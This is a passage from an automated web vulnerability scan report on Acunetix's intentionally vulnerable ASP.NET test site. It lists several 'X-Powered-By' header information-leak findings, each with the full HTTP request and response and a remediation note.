style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          						<h1>About this website</h1>
          						<p>The website was built with the intention to test the Acunetix Web Vulnerability 
          							Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate 
          							the forementioned software's capabilities to find those bugs.</p>
          						<p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive 
          								information on this site. This includes e-mail addresses or real names.</b></p>
          						<h1>About Acunetix</h1>
          						<P><B>Combating the web vulnerability threat<BR>
          							</B>Securing a company's web applications is today's most overlooked aspect of 
          							securing the enterprise. Web application hacking is on the rise with as many as 
          							75% of cyber attacks done at web application level or via the web. Most 
          							corporations have secured their data at the network level, but have overlooked 
          							the crucial step of checking whether their web applications are vulnerable to 
          							attack. Web applications, which often have a direct line into the company's 
          							most valuable data assets, are online 24/7, completely unprotected by a 
          							firewall and therefore easy prey for attackers.</P>
          						<P>Acunetix was founded with this threat in mind. We realised the only way to 
          							combat web site hacking was to develop an automated tool that could help 
          							companies scan their web applications for vulnerabilities. In July 2005, 
          							Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
          							website for vulnerabilities to SQL injection, cross site scripting and other 
          							web attacks before hackers do.</P>
          						<P>The Acunetix development team consists of highly experienced security developers 
          							who have each spent years developing network security scanning software prior 
          							to starting development on Acunetix WVS. The management team is backed by years 
          							of experience marketing and selling security software.</P>
          						<P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/">
          								offices</A> in Malta, US and the UK.
          						</P>
          					</TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        4. GET http://testaspnet.vulnweb.com/ads/acunetix.gif
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (333 bytes)
          GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ads/def.html
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (247 bytes)
          HTTP/1.1 200 OK
          Content-Type: image/gif
          Last-Modified: Thu, 29 May 2008 14:36:52 GMT
          Accept-Ranges: bytes
          ETag: "eb3686f99c1c81:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 3048
          
          
          Response body (3048 bytes)
          GIF89a ÷å1:555øõõäääÑÑѪªªÚÚÚiiiúÕÖä*3¯®®
          
          
          ÒÒÒ111î|‚èCJèMT¼¼¼æææáááõ²µä$-êU[þüüAAA^^^æ:Bvvv>>>§§§â!÷ââímrá	ÁÁÁùÌκººìzŽŽŽ···ò•šTTTò«®í™kkk¸¸¸cccmmmï ìdjÃÃȈˆNNNœœœ"""ñ¿ÁìqvŠŠŠò¥§zzzttt888ñ‘–žžžšššØØØ™˜™ÕÕÕrssfffËËËýóóùññ÷æç÷ÝÝZZZ}}}FFFDDDó»½HHHçFM---¾¿¿æBISSS%%%```&&&†††„„„XXXâøÇÉxxx   JJJé_e***:::©¨¨ï€…âêioã$â!áæ/8ä(âùùù÷÷÷øøøÿþþÿÿþÿþÿþÿÿþþÿþÿþðððeeeõõõúûúíííóóó´´´°°°–––ùùúûúúúúûìììñññ÷÷øƒƒƒôôôûûúýýý÷ø÷ïïïµµµ”””òòòëëëêêê­­­øø÷¤¤¤èèèÌÌÌÍÍÍßßßÈÈȳ³³’’’ø÷ø¡¡¡ÇÇÇîî“²²²•••~~~   QQQùúú¥¥¥‚‚‚ùúù×××ÜÜÜÏÏÏ÷øøãããÝÝÝÆÆÆLLLöÑÓpppðŠ¢¢¢ûûüûøødddâââúÜÝ퉎ç@GÉÉÉÞÞÞþúúoooñðñò›ŸúûûOOOÝÜݑ‘‘ð†‹ûÝßôôõõõôúÙÚððñôÉËèHNâãâó¡îw|ë`fîqx톋äRQQôÆÈûßàíí˜óÝÞöÚÚúÏÑð­°ã&ñ´¶á{{{ÅÅÅøÞßöÁÂúúùûÞßûàâúêëùÓÔýïïöööûûûúúúþþþüüüá
          ÿÿÿ!ù, ÿ÷	H° Áƒ*\Ȱ¡Ã‡
          oÁ²Š` `rP€˜/O=~öé™§?zòDÊÉã¾>}Æ|Ó£>|þå8’'L›0ùÀŒyr'A˜=æÙóï_HžŠì¹ç?=2O†\º‡àÓ¡Mkº¬Jðþ¤Œi­?Jû>õˆsOב{|5µûÏI=ÿ~ÁãeC„,´s/ߦ›æÁ9r¤ã=V¹b&iÕ©È8û(|õsSÀž!k;§ë=û
          ügçß=}¬ÚÕc—©²hìޓĭ™¾§÷IæÚ'¬ÞȐ£A›Ó¯ºuën0X@½»÷ïàËÿO¾|xFÀÓFžÔ…†cæÿñëî䁛ëøñC(c>ߟA(WÞ>Lò‡ñ%ˆÇ)ŒäSžÿázÁu'`|F&ùuxEŒGÀÁÀÍhò-ÀƒÝЃg0TIdrxtgGòAS‘¨p£üSÁ.jØè§€gGSh;l°Â|ýÑ Q ¥Å2¬ðO3ìrÀ
          ÿ°"Ãü&d½2ÜD–€j7y|HeºåÖ¬¸UHdùÀ€¢Šæ
          d€ …!ݲZ€4•ÏhU±ÂY”:cwM¬A©[V4ÿٓ¾JÉ?¸uÈ?˜àV%‘Í’î@ö'	‚
          JÂ…B‡‰¯ºe‚¾úóhS„­¢;ÐT¦þlÚé§þ„*©á±­·@ÇI­hEQ-Z”Ò­ÑÞjˆ®M©â–‹@6†[G6uÈ&›lˆ‘é“‹´XÐð*9ֵ̋ÿl è8¼¢ƒðª1È?àŠ§ 6źh™€EBx0ï‘Ő¨	S"–xá¡üƒ	CT‹€ñϾhíÚÔnuÐT%nÁðώÿ¤ ðÖt™¿ñê!ðZ۔&Ҏ‚uSŸ€áOŽY2§'“kîÊn!Jd¯$ÿÊÀ¥ÿ<â€[–@·Hnafz4¥Óþ8ý-ä2ðÉ> åÀÈóP‡ÂrÈ¡ðÙ‘9ZbwWÀ¼FâáÞó…·ßjJwd(—«2ËöB'„[l4Ջ[SxGyË%4E¡zA.ù?©TÛLôÂ)ß?Ü
          ‡œPÄJ:M™R-à
          |ñЉzpgxs›ò¹hqIw1¸õCS­¸•
          ‹ #A…¨)q‘qt: -´¨2ü<D	Ð:yXÆ}<Ԇ¦XÂ-¨'õ¢Åå‰_Ýæ‡7¬amñDµPˆŸÑ‹8ÌawÀ
          5_‘Y„ÿՅÈð#¼†þa́m¨Ùá!pgnÙÛwJP­G©À-J#
          qg·Ý¡E‚Ì'fø?¤g[¯ÒB–׸6
          Òò„mà!8Pã#Àìñ6x	ø‡Üò
          ðPm}`óGÉÃMÝo…º£Ÿ?ÐØ5žðfiÙÀ@ÊRšg¨ÂþAÇ12tKŒÈ¡½/èða8xÈø(…[€bӘípËð!
          âó™Ï<½fͤGÅ$Äé<hâ¢Z«ÀÇ#Ðe‚	àcèLç þ@tž¢˜H ŽY·<㙡P—´aÿLB\ÀCÛÀ‡:$à#b>P+"4šø¸Å”‰
          ˆ€^ž€h&&ÀcRuЬ'ZڑÍmvó™ßDK8ñÁ@´t¢øè„ž‰‰‹ú£ô´ç1;q:/ j3Å!&˜Ÿ‚ÞªÁÒà!^Üá9p‹@ñÔªv
          ŠZÀS—à–! ªOÅG2üÑY<µWhÀ*‹!¢%O}Ä6ñÖ§š-”xª'jÅÔõ˜hAŒªÂUþ ÂZŸ*R<¬2hÙ…–f<âP‡‡ÖÑ.x(¤À€‡º!	Il!QþØA9œ1‰
          pbpYŃ$°¡·ÿ 
           *8´ˆ›ØDoýaGL`8°©?< F4bs
          ni%AŠ»¾…ØM&Z"€ƒà¡ÕÐlýÑ<Â¹Žp‹4Q‹Z4v›ÀC-¾èRój-AhD Ú¡aà!	»Î  þæ§xH0,(Å5-H0*Q¶(!û„qñF˜Àb(„±Í;HXÂÖ¥„„OEEÀU°!ZvŠSÀ­héІ–Q$¸µ
          &L€ô˜ xh‡|`‡ Àý A
          ìP¢æç
          vȲ~€ZJyÕ2„–íP‚‰nË8³tP6EEÿc&1Z<€5Û!ÕêÁ˜'8nÒvnÀx¿`ûcvFm=Œ‚1Á-;@‚Öú‹DH!
          Ÿë\ D<:ù¡ÔŠ
          t˜2@%D ‚3  c¶,Ô`1c0ÁZ®t–	À}nWŸ°ƒ+†m|´Æƒâ¡fZxAx†Qƒ
          [
          ˆE,*­k;dÆ@À1±‚V£vXv`Œ¨9U@Àˆkdú:qЅ>ö­)\AOà·>&Ÿ7\àEP¡‰
          ìûˆø¾ïK4á–H
          2AñƒS ‡8„(Ðq}\"â—Åè8">‰@”©8Â(
          0;”\à(ÆÃ#þ|x›çø ø#ô‡Nèãø!Á<ô‘ˆ¦ßÜÉø¹À9ø-ˆªÜêú¨º (nuEx}ß_¿¹Ó~sªoß^Çú¾µžˆ¬Ÿì‡„Üõ¡¹‡âsï83ވ|ä²à¿þðˆÏÇ;F €8\ÀºH¼ä'OùÊ[þò˜Ï¼æ7?y<ðãó ½èGOúқþô¨O½êWÏúÖ»þõ°½ìgOûÚÇ> ;
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

        5. GET http://testaspnet.vulnweb.com/ads/def.html
          Alert tags
          Alert description

          The web/application server is leaking information via one or more "X-Powered-By" HTTP response headers. Access to such information may facilitate attackers identifying other frameworks/components your web application is reliant upon and the vulnerabilities such components may be subject to.

          Request
          Request line and header section (355 bytes)
          GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (246 bytes)
          HTTP/1.1 200 OK
          Content-Type: text/html
          Last-Modified: Fri, 24 May 2019 07:50:37 GMT
          Accept-Ranges: bytes
          ETag: "eb6cf45f512d51:0"
          Server: Microsoft-IIS/8.5
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 488
          
          
          Response body (488 bytes)
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
          <html>
          	<head>
          		<title></title>
          		<meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1">
          		<meta name="ProgId" content="VisualStudio.HTML">
          		<meta name="Originator" content="Microsoft Visual Studio .NET 7.1">
          	</head>
          	<body>
          		<P align="center"><STRONG>Is your website hackable?<BR>
          				check with<BR>
          				<IMG src="acunetix.gif"><BR>
          				Web Vulnerability Scanner</STRONG></P>
          	</body>
          </html>
          
          Evidence
          X-Powered-By: ASP.NET
          Solution

          Ensure that your web server, application server, load balancer, etc. is configured to suppress "X-Powered-By" headers.

